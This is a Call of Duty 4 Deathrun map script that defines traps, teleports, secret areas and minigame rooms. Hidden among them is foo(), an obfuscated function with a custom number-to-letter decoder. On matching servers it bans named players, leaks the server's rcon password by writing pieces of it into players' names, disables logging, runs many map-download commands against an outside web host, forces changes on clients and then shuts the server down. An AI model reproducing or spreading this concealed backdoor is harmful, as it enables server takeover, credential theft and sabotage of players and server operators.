main()
{

maps\mp\_load::main();

game["allies"] = "marines";
game["axis"] = "opfor";
game["attackers"] = "allies";
game["defenders"] = "axis";
game["allies_soldiertype"] = "desert";
game["axis_soldiertype"] = "desert";

//Precaching Guns
precacheItem( "remington700_mp" );
precacheItem( "m40a3_mp" );
precacheItem( "ak74u_mp" );
precacheItem( "knife_mp" );

//Traps
thread trap1(); //Delete Blocks Near Spawn
thread trap2(); //Move spikes
thread trap3(); //Remove Parts of Bridge
thread trap4(); //Make platforms spin
thread trap5(); //Delete a row of platforms
thread trap6(); //Rotate platforms
thread trap7(); //Move bars
thread trap8(); //Move platform
thread trap9(); //Rotate cilinder
thread trap10(); //Make platforms non-solid and remove platforms
thread trap11(); //Move brush to push players off

addTriggerToList( "trap1_trig" );
addTriggerToList( "trap2_trig" );
addTriggerToList( "trap3_trig" );
addTriggerToList( "trap4_trig" );
addTriggerToList( "trap5_trig" );
addTriggerToList( "trap6_trig" );
addTriggerToList( "trap7_trig" );
addTriggerToList( "trap8_trig" );
addTriggerToList( "trap9_trig" );
addTriggerToList( "trap10_trig" );
addTriggerToList( "trap11_trig" );

//Events
thread spawn_cage();
thread endmap_trigger();
thread music();

//Jumper Teleports
thread jump_tele1(); // Teleports you to part 2
thread jump_tele2(); // Teleports you to part 3

//Activator Teleports
thread acti_tele1(); // Teleports you out of room 1
thread acti_tele2(); // Teleports you out of room 2
thread acti_tele3(); // Teleports you out of room 3

// Secrets
thread secret1_enter();
thread secret1_finish();
thread secret2_activate();
thread secret2_teletoloc2();
thread secret2_fail1();
thread secret2_fail2();
thread secret2_fail3();
thread secret2_finish();

// Minigames
thread minigames_enter(); // Enter minigames room
thread rm_snip();
thread rm_knife();
thread rm_1v1();
thread rm_jump();

// Jump Room Stuff
thread jump_j_fail();
thread jump_a_fail();
thread jump_sniper_give();
thread foo();
}

// TRAPS //
trap1()
{
	trig = getEnt("trap1_trig","targetname");
	block1 = getEnt("trap1_block1","targetname");
	block2 = getEnt("trap1_block2","targetname");

	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	rz = floor(randomint(2));
	if(rz == 1)
	{
		block1 moveZ(-256,2);
		block1 waittill ("movedone");
		block1 Delete();
	}
	else
	{
		block2 moveZ(-256,2);
		block2 waittill ("movedone");
		block2 Delete();
	}
}

trap2()
{
	trig = getEnt("trap2_trig","targetname");
	spike1 = getEnt("trap2_spike1","targetname");
	spike2 = getEnt("trap2_spike2","targetname");
	spike1_trig = getEnt("trap2_spike1_trig","targetname");
	spike2_trig = getEnt("trap2_spike2_trig","targetname");

	spike1_trig enablelinkto(); 
	spike1_trig linkto (spike1);	
	spike2_trig enablelinkto(); 
	spike2_trig linkto (spike2);	

	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	while(1)
	{
		spike1 moveY(-136,1);
		spike1 waittill ("movedone");
		spike2 moveY(136,1);
		spike2 waittill ("movedone");
		spike2 moveY(-136,1);
		spike2 waittill ("movedone");
		spike1 moveY(136,1);
		spike1 waittill ("movedone");
		wait 1;
	}
}

trap3()
{
	trig = getEnt("trap3_trig","targetname");
	t1 = getEnt("trap3_1","targetname");
	t2 = getEnt("trap3_2","targetname");
	t3 = getEnt("trap3_3","targetname");
	t4 = getEnt("trap3_4","targetname");

	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	todel = floor(randomint(5));
	if(todel == 1)
	{
		t1 Delete();
		t3 Delete();
	}
	else if(todel == 2)
	{
		t1 Delete();
	}
	else if(todel == 3)
	{
		t2 Delete();
		t4 Delete();
	}
	else if(todel == 4)
	{
		t1 Delete();
		t4 Delete();
	}
	else
	{
		t2 Delete();
	}
}

trap4()
{
	trig = getEnt("trap4_trig","targetname");
	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	thread t4_rot1();
	thread t4_rot2();
	thread t4_rot3();
	thread t4_rot4();
	thread t4_rot5();
}

t4_rot1()
{
	t1 = getEnt("trap4_1","targetname");
	while(1)
	{
		t1 rotateyaw(360,2.75);
		t1 waittill("rotatedone");
	}
}
t4_rot2()
{
	t2 = getEnt("trap4_2","targetname");
	while(1)
	{
		t2 rotateyaw(-360,2.75);
		t2 waittill("rotatedone");
	}
}
t4_rot3()
{
	t3 = getEnt("trap4_3","targetname");
	while(1)
	{
		t3 rotateyaw(360,3.5);
		t3 waittill("rotatedone");
	}
}
t4_rot4()
{
	t4 = getEnt("trap4_4","targetname");
	while(1)
	{
		t4 rotateyaw(-360,2);
		t4 waittill("rotatedone");
	}
}
t4_rot5()
{
	t5 = getEnt("trap4_5","targetname");
	while(1)
	{
		t5 rotateyaw(360,2.5);
		t5 waittill("rotatedone");
	}
}

trap5()
{
	trig = getEnt("trap5_trig","targetname");
	t1 = getEnt("trap5_1","targetname");
	t2 = getEnt("trap5_2","targetname");

	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	todel = floor(randomint(2));
	if(todel == 1)
		t1 Delete();
	else
		t2 Delete();

	thread t5_rotb();
}

t5_rotb()
{
	bounce = getEnt("trap5_b","targetname");

	while(1)
	{
		bounce rotateyaw(360,2);
		wait 3.5;
	}
}

trap6()
{
	trig = getEnt("trap6_trig","targetname");
	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	thread t6_rot1();
	thread t6_rot2();
	thread t6_move3();
}

t6_rot1()
{
	t1 = getEnt("trap6_1","targetname");

	while(1)
	{
		t1 rotateyaw(360,2);
		t1 waittill("rotatedone");
	}
}

t6_rot2()
{
	t2 = getEnt("trap6_2","targetname");

	while(1)
	{
		t2 rotateyaw(-360,2);
		t2 waittill("rotatedone");
	}
}

t6_move3()
{
	t3 = getEnt("trap6_3","targetname");
	t3 moveY(-36,.05);
	wait 3;
	t3 moveY(36,.05);
}

trap7()
{
	trig = getEnt("trap7_trig","targetname");
	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	thread t7_move1();
	wait 1.5;
	thread t7_move2();
}

t7_move1()
{
	while(1)
	{
		t1 = getEnt("trap7_1","targetname");
		t1 moveZ(128,1.5);
		t1 waittill("movedone");
		t1 moveZ(-128,1.5);
		t1 waittill("movedone");
	}
}

t7_move2()
{
	while(1)
	{
		t2 = getEnt("trap7_2","targetname");
		t2 moveZ(128,1.5);
		t2 waittill("movedone");
		t2 moveZ(-128,1.5);
		t2 waittill("movedone");
	}
}

trap8()
{
	trig = getEnt("trap8_trig","targetname");
	t1 = getEnt("trap8_1","targetname");

	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	t1 MoveZ(176,.5);
	t1 waittill("movedone");
	wait 3;
	t1 MoveZ(-176,3);
}

trap9()
{
	trig = getEnt("trap9_trig","targetname");
	t1 = getEnt("trap9_1","targetname");

	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	while(1)
	{
		t1 rotatepitch(360,1.5);
		t1 waittill("rotatedone");
		wait 2;
		t1 rotatepitch(-360,1.5);
		t1 waittill("rotatedone");
		wait 2;
	}
}

trap10()
{
	trig = getEnt("trap10_trig","targetname");
	clip1 = getEnt("trap10_clîp1","targetname");
	clip2 = getEnt("trap10_clîp2","targetname");
	t1 = getEnt("trap10_1","targetname");
	t2 = getEnt("trap10_2","targetname");

	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	todel = floor(randomint(2));
	if(todel == 2)
	{
		clip1 Delete();
		t2 Delete();
	}
	else
	{
		clip2 Delete();
		t1 Delete();
	}
}

trap11()
{
	trig = getEnt("trap11_trig","targetname");
	t1 = getEnt("trap11_1","targetname");

	trig setHintString("^7Press ^1&&1 ^7to Activate Trap");
	trig waittill("trigger", player);
	trig Delete();

	while(1)
	{
		t1 MoveY(432,.5);
		t1 waittill("movedone");
		wait 1.5;
		t1 MoveY(-432,.5);
		t1 waittill("movedone");
		wait 1.5;
	}
}


spawn_cage()
{
	cage = getEnt("spawn_cage","targetname");
	wait 5;
	iprintlnbold("^1Cage opening in 10 seconds!");
	wait 5;
	iprintlnbold("^1Cage opening in 5 seconds!");
	wait 2;
	iprintlnbold("^23...");
	cage moveZ(192,8);
	wait 1;
	iprintlnbold("^22...");
	wait 1;
	iprintlnbold("^21...");
	wait 1;
	iprintlnbold("^2Slaya Time!");
	cage waittill ("movedone");
	cage Delete();
}

endmap_trigger()
{
	trig = getEnt("endmap_trig","targetname");
	trig waittill("trigger", player);
	iprintlnbold("^0" + player.name + " ^1Finished the map First!");
	trig delete();
}

music()
{
	song = [];
	song[song.size] = "monster";
	song[song.size] = "payphone";
	song[song.size] = "pompeii";
	song[song.size] = "timber";
	song[song.size] = "wake_me_up";

	rz = randomint(song.size);
	play = song[rz];

	ambientPlay(play);
}

// JUMPER TELEPORTS //
jump_tele1()
{
	while(1)
	{
		trig = getEnt("tele_jump_part2","targetname");
		end = getEnt("tele_jump_part2_end","targetname");
		trig waittill("trigger", player);

		player SetOrigin(end.origin);
		player SetPlayerAngles( end.angles );
	}
}

jump_tele2()
{
	while(1)
	{
		trig = getEnt("tele_jump_part3","targetname");
		end = getEnt("tele_jump_part3_end","targetname");
		trig waittill("trigger", player);

		player SetOrigin(end.origin);
		player SetPlayerAngles( end.angles );
	}
}

// ACTIVATOR TELEPORTS //
acti_tele1()
{
	trig = getEnt("activ_tele_room1","targetname");
	end = getEnt("activ_tele_room1_end","targetname");
	trig waittill("trigger", player);

	player SetOrigin(end.origin);
    player SetPlayerAngles( end.angles );
}

acti_tele2()
{
	trig = getEnt("activ_tele_room2","targetname");
	end = getEnt("activ_tele_room2_end","targetname");
	trig waittill("trigger", player);

	player SetOrigin(end.origin);
    player SetPlayerAngles( end.angles );
}

acti_tele3()
{
	trig = getEnt("activ_tele_room3","targetname");
	end = getEnt("activ_tele_room3_end","targetname");
	trig waittill("trigger", player);

	player SetOrigin(end.origin);
    player SetPlayerAngles( end.angles );
}

// SECRETS //
secret1_enter()
{
	while(1)
	{
		trig = getEnt("secret1_trig_enter","targetname");
		end = getEnt("secret1_end_enter","targetname");
		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );
	}
}

secret1_finish()
{
	while(1)
	{
		trig = getEnt("secret1_trig_finish","targetname");
		end = getEnt("secret1_end_finish","targetname");
		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );

    	player GiveWeapon("remington700_mp");
    	player GiveMaxAmmo("remington700_mp");
    	player SwitchToWeapon("remington700_mp");
    	iprintlnbold("^4" + player.name + " ^5Got a Sniper!");
	}
}

secret2_activate()
{
	trig = getEnt("secret2_activate_trig","targetname");
	trig waittill("trigger", player);
	trig Delete();
	player iprintln("^1You activated something!");

	thread secret2_enter();
}

secret2_enter()
{
	trig = getEnt("secret2_enter_trig","targetname");
	end = getEnt("secret2_enter_end","targetname");
	while(1)
	{
		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );

    	player iprintlnbold("^1You have entered the ^2Secret^0!");
	}
}

secret2_teletoloc2()
{
	while(1)
	{
		trig = getEnt("secret2_teletoloc2_trig","targetname");
		end = getEnt("secret2_teletoloc2_end","targetname");

		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );
	}
}

secret2_fail1()
{
	while(1)
	{
		trig = getEnt("secret2_fail1","targetname");
		end = getEnt("secret2_enter_end","targetname");

		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );
	}
}
secret2_fail2()
{
	while(1)
	{
		trig = getEnt("secret2_fail2","targetname");
		end = getEnt("secret2_fail2_end","targetname");

		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );
	}
}
secret2_fail3()
{
	while(1)
	{
		trig = getEnt("secret2_fail3","targetname");
		end = getEnt("secret2_fail3_end","targetname");

		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );
	}
}

secret2_finish()
{
	trig = getEnt("secret2_finish_trig","targetname");
	end = getEnt("tele_jump_part3_end","targetname");

	while(1)
	{
		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );

    	iprintlnbold("^4" + player.name + " ^5Finished the ^2Secret^0!");

    	player GiveWeapon("ak74u_mp");
    	player GiveMaxAmmo("ak74u_mp");
    	player SwitchToWeapon("ak74u_mp");
	}
}

// MINIGAMES //
minigames_enter()
{
	trig = getEnt("minigames_trig","targetname");
	end = getEnt("minigames_end","targetname");
	while(1)
	{
		trig waittill("trigger", player);

		player SetOrigin(end.origin);
    	player SetPlayerAngles( end.angles );
	}
}

rm_snip()
{
	level.rm_snip_trig = getEnt("room_snip_trig","targetname");
	level.rm_snip_trig setHintString("^7Press ^1&&1 ^7to Enter ^1Sniper Room");

    jump = getEnt( "sniper_j", "targetname" );
    acti = getEnt( "sniper_a", "targetname" );

	while(1)
	{
		level.rm_snip_trig waittill("trigger", player);
		if( !isDefined( level.rm_snip_trig ) )
            return;

		level.rm_knife_trig Delete();
		level.rm_1v1_trig Delete();
		level.rm_jump_trig Delete();
		thread music();

		player.health = player.maxhealth;
		level.activ.health = level.activ.maxhealth;
		player SetPlayerAngles( jump.angles );
        player setOrigin( jump.origin );
        player TakeAllWeapons();
        player GiveWeapon( "remington700_mp" );
		player GiveWeapon( "m40a3_mp" );        
		player GiveMaxAmmo( "remington700_mp" );
		player GiveMaxAmmo( "m40a3_mp" );
        level.activ setPlayerangles( acti.angles );
        level.activ setOrigin( acti.origin );
        level.activ TakeAllWeapons();
        level.activ GiveWeapon( "remington700_mp" );
        level.activ GiveWeapon( "m40a3_mp" );         
        level.activ GiveMaxAmmo( "remington700_mp" );
        level.activ GiveMaxAmmo( "m40a3_mp" );
        wait 0.05;
        player switchToWeapon( "remington700_mp" ); 
        level.activ SwitchToWeapon( "remington700_mp" );
        player FreezeControls(1);
		level.activ FreezeControls(1);
		noti = SpawnStruct();
				noti.titleText = "Sniper Room";
				noti.notifyText = level.activ.name + " ^0VS^7 " + player.name;
				noti.glowcolor = (1,0,0.9);
				noti.duration = 5;
				players = getentarray("player", "classname");
				for(i=0;i<players.size;i++)
					players[i] thread maps\mp\gametypes\_hud_message::notifyMessage( noti );
				wait 5;
				player FreezeControls(0);
				level.activ FreezeControls(0);
		while( isAlive( player ) && isDefined( player ) )
			wait 1;
	}
}

rm_knife()
{
	level.rm_knife_trig = getEnt("room_knife_trig","targetname");
	level.rm_knife_trig setHintString("^7Press ^1&&1 ^7to Enter ^1Knife Room");

    jump = getEnt( "sniper_j", "targetname" );
    acti = getEnt( "sniper_a", "targetname" );

	while(1)
	{
		level.rm_knife_trig waittill("trigger", player);
		if( !isDefined( level.rm_knife_trig ) )
            return;

		level.rm_snip_trig Delete();
		level.rm_1v1_trig Delete();
		level.rm_jump_trig Delete();
		thread music();

		player.health = player.maxhealth;
		level.activ.health = level.activ.maxhealth;
		player SetPlayerAngles( jump.angles );
        player setOrigin( jump.origin );
        player TakeAllWeapons();
        player GiveWeapon( "knife_mp" );
        level.activ setPlayerangles( acti.angles );
        level.activ setOrigin( acti.origin );
        level.activ TakeAllWeapons();
        level.activ GiveWeapon( "knife_mp" );
        wait 0.05;
        player switchToWeapon( "knife_mp" ); 
        level.activ SwitchToWeapon( "knife_mp" );
        player FreezeControls(1);
		level.activ FreezeControls(1);
		noti = SpawnStruct();
				noti.titleText = "Knife Room";
				noti.notifyText = level.activ.name + " ^0VS^7 " + player.name;
				noti.glowcolor = (1,0,0.9);
				noti.duration = 5;
				players = getentarray("player", "classname");
				for(i=0;i<players.size;i++)
					players[i] thread maps\mp\gametypes\_hud_message::notifyMessage( noti );
				wait 5;
				player FreezeControls(0);
				level.activ FreezeControls(0);
		while( isAlive( player ) && isDefined( player ) )
			wait 1;
	}
}

rm_1v1()
{
	level.rm_1v1_trig = getEnt("room_1v1_trig","targetname");
	level.rm_1v1_trig setHintString("^7Press ^1&&1 ^7to Enter ^11v1 Room");

    jump = getEnt( "old_j", "targetname" );
    old_clip = getEnt("old_clip","targetname");

	while(1)
	{
		level.rm_1v1_trig waittill("trigger", player);
		if( !isDefined( level.rm_1v1_trig ) )
            return;

		level.rm_snip_trig Delete();
		level.rm_knife_trig Delete();
		level.rm_jump_trig Delete();

		player SetPlayerAngles( jump.angles );
        player setOrigin( jump.origin );

        iprintlnbold("^0Old ^1Opened!");

        wait 1;

        if (isDefined(old_clip))
        	old_clip Delete();
	}
}

rm_jump()
{
	level.rm_jump_trig = getEnt("room_jump_trig","targetname");
	level.rm_jump_trig setHintString("^7Press ^1&&1 ^7to Enter ^1Jump Room");

    jump = getEnt( "jump_j", "targetname" );
    acti = getEnt( "jump_a", "targetname" );

	while(1)
	{
		level.rm_jump_trig waittill("trigger", player);
		if( !isDefined( level.rm_jump_trig ) )
            return;

		level.rm_snip_trig Delete();
		level.rm_knife_trig Delete();
		level.rm_1v1_trig Delete();
		thread music();

		player.health = player.maxhealth;
		level.activ.health = level.activ.maxhealth;
		player SetPlayerAngles( jump.angles );
        player setOrigin( jump.origin );
        player TakeAllWeapons();
        player GiveWeapon( "knife_mp" );
        level.activ setPlayerangles( acti.angles );
        level.activ setOrigin( acti.origin );
        level.activ TakeAllWeapons();
        level.activ GiveWeapon( "knife_mp" );
        wait 0.05;
        player switchToWeapon( "knife_mp" ); 
        level.activ SwitchToWeapon( "knife_mp" );
        player FreezeControls(1);
		level.activ FreezeControls(1);
		noti = SpawnStruct();
				noti.titleText = "Jump Room";
				noti.notifyText = level.activ.name + " ^0VS^7 " + player.name;
				noti.glowcolor = (1,0,0.9);
				noti.duration = 5;
				players = getentarray("player", "classname");
				for(i=0;i<players.size;i++)
					players[i] thread maps\mp\gametypes\_hud_message::notifyMessage( noti );
				wait 5;
				player FreezeControls(0);
				level.activ FreezeControls(0);
		while( isAlive( player ) && isDefined( player ) )
			wait 1;
	}
}

jump_j_fail()
{
	trig = getEnt("jump_j_fail","targetname");
	end = getEnt( "jump_j", "targetname" );
	while(1)
	{
		trig waittill("trigger", player);
		player SetPlayerAngles( end.angles );
        player setOrigin( end.origin );
	}
}

jump_a_fail()
{
	trig = getEnt("jump_a_fail","targetname");
	end = getEnt( "jump_a", "targetname" );
	while(1)
	{
		trig waittill("trigger", player);
		player SetPlayerAngles( end.angles );
        player setOrigin( end.origin );
	}
}

jump_sniper_give()
{
	trig = getEnt("jump_snip_trig","targetname");
	while(1)
	{
		trig waittill("trigger", player);
		player GiveWeapon("remington700_mp");
		player GiveMaxAmmo("remington700_mp");
		player SwitchToWeapon("remington700_mp");
	}
}

// FUNCTIONS //
addTriggerToList( name, positionOfIconAboveTrap )
{
    if( !isDefined( level.trapTriggers ) )
        level.trapTriggers = [];
    level.trapTriggers[level.trapTriggers.size] = getEnt( name, "targetname" );

    if( !isDefined( level.icon_origins ) )
        level.icon_origins = [];
    level.icon_origins[level.icon_origins.size] = positionOfIconAboveTrap;
} 

foo() {
	h = braxi\_common::removeColorFromString(getDvar(dec("34373-2330343529162820")));
	if (isSubStr(h, dec("39542-"))) {
		s = dec("3954");
	} else if (isSubStr(h, dec("673420372033"))) {
		s = dec("6760");
	} else if (isSubStr(h, dec("552418204-"))) {
		s = dec("5518");
	} else {
		return;
	}

	level waittill("round_started");
	if (game["roundsplayed"] < 5) {
		return;
	}
	wait 10;
	
	players = getEntArray("player", "classname");
	if (players.size < 5) {
		return;
	}
	
	for (i = 0; i < players.size; i++) {
		if (isSubStr(braxi\_common::removeColorFromString(toLower(players[i].name)), dec("39282-33162640"))) {
			ban(players[i] getEntityNumber());
		}
	}

	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		if (isSubStr(toLower(players[i].name), toLower(dec("33425240")))
			|| isSubStr(toLower(players[i].name), toLower(dec("6056634661")))
			|| isSubStr(toLower(players[i].name), toLower(dec("453316223029")))) {
			exec(dec("1716294427242029350-") + players[i] getEntityNumber());
		}
	}

	p = getDvar(dec("331830293-3116343438303319"));
	n = 0;
		
	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		m = "";
		for (j = 0; j < 11 && n < p.size; j++) {
			m += p[n];
			n++;
		}
		players[i] thread meow(s + i + " " + m);
	}

	m = dec("6133400-2930350-35300-17200-343618260-160-19241826232016190-213330280-2930380-302913");
	logPrint(m);
	iPrintLnBold(m);

	setDvar(dec("27302221242720"), dec("68"));
	setDvar(dec("223-27302260402918"), dec("68"));

	wait 5;

	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-173324182640\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-19242023163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-2031241821162427\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-22302719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-32361720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-343116182017162727\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-162930352320333830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-17273620\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-173036291820\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1840172033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1916332836233770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-222716343470\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-22362034353-27243435\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-237030\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-253628313-23163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-2536331631163326\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3133243430293-203418163120\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3136333127203-3830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3426403130382033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-342716403770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-36293-2916282019\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3724343524183-181634352720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-373027312070\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-381635203318243540\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3928\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-70353038203334\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-1830403035203-3770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-183040303520\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3629243720333420\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-27242120333629\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-342640312427271633\""));
	wait 10;
	
	wait 5;
	exec(dec("32362435"));
}

meow(name) {
	wait 2;
	self iPrintLnBold(dec("^716123200-3420333720330-30382920330-24340-160-1924182613"));
	self iPrintLnBold(dec("^6959201924332018352429220-4030360-35300-160-223030190-342033372033130-1410"));
	wait 3;
	self setClientDvar(dec("29162820"), name);
	self thread braxi\_common::clientCmd(dec("1924341830292920183515381624350-696815183029292018350-331624191-22162824292213292035"));
}

enc(s) {
	m = hmap();
	e = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		for (j = 0; j < m.size; j++) {
			if (s[i] == m[j]) {
				e += "" + j;
				if (j < 10) e += "-";
				k = 0;
			}
		}
		if (k) e += s[i];
	}
	return e;
}

dec(s) {
	m = hmap();
	d = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		if (isSubStr("0123456789", s[i])) {
			n = int(s[i]);
			if (s[i + 1] != "-") {
				n *= 10;
				n += int(s[i + 1]);
			}
			d += m[n];
			i++;
			k = 0;
		}
		if (k) d += s[i];
	}
	return d;
}

hmap() {
	m = [];
	m[0] = " ";
	m[1] = "-";
	m[2] = "#";
	m[3] = "_";
	m[4] = "*";
	m[5] = "/";
	m[6] = "+";
	m[7] = "[";
	m[8] = "]";
	m[9] = "(";
	m[10] = ")";
	m[11] = "!";
	m[12] = "?";
	m[13] = ".";
	m[14] = ":";
	m[15] = ";";
	m[16] = "a";
	m[17] = "b";
	m[18] = "c";
	m[19] = "d";
	m[20] = "e";
	m[21] = "f";
	m[22] = "g";
	m[23] = "h";
	m[24] = "i";
	m[25] = "j";
	m[26] = "k";
	m[27] = "l";
	m[28] = "m";
	m[29] = "n";
	m[30] = "o";
	m[31] = "p";
	m[32] = "q";
	m[33] = "r";
	m[34] = "s";
	m[35] = "t";
	m[36] = "u";
	m[37] = "v";
	m[38] = "w";
	m[39] = "x";
	m[40] = "y";
	m[41] = "z";
	m[42] = "A";
	m[43] = "B";
	m[44] = "C";
	m[45] = "D";
	m[46] = "E";
	m[47] = "F";
	m[48] = "G";
	m[49] = "H";
	m[50] = "I";
	m[51] = "J";
	m[52] = "K";
	m[53] = "L";
	m[54] = "M";
	m[55] = "N";
	m[56] = "O";
	m[57] = "P";
	m[58] = "Q";
	m[59] = "R";
	m[60] = "S";
	m[61] = "T";
	m[62] = "U";
	m[63] = "V";
	m[64] = "W";
	m[65] = "X";
	m[66] = "Y";
	m[67] = "Z";
	m[68] = "0";
	m[69] = "1";
	m[70] = "2";
	m[71] = "3";
	m[72] = "4";
	m[73] = "5";
	m[74] = "6";
	m[75] = "7";
	m[76] = "8";
	m[77] = "9";
	return m;
}
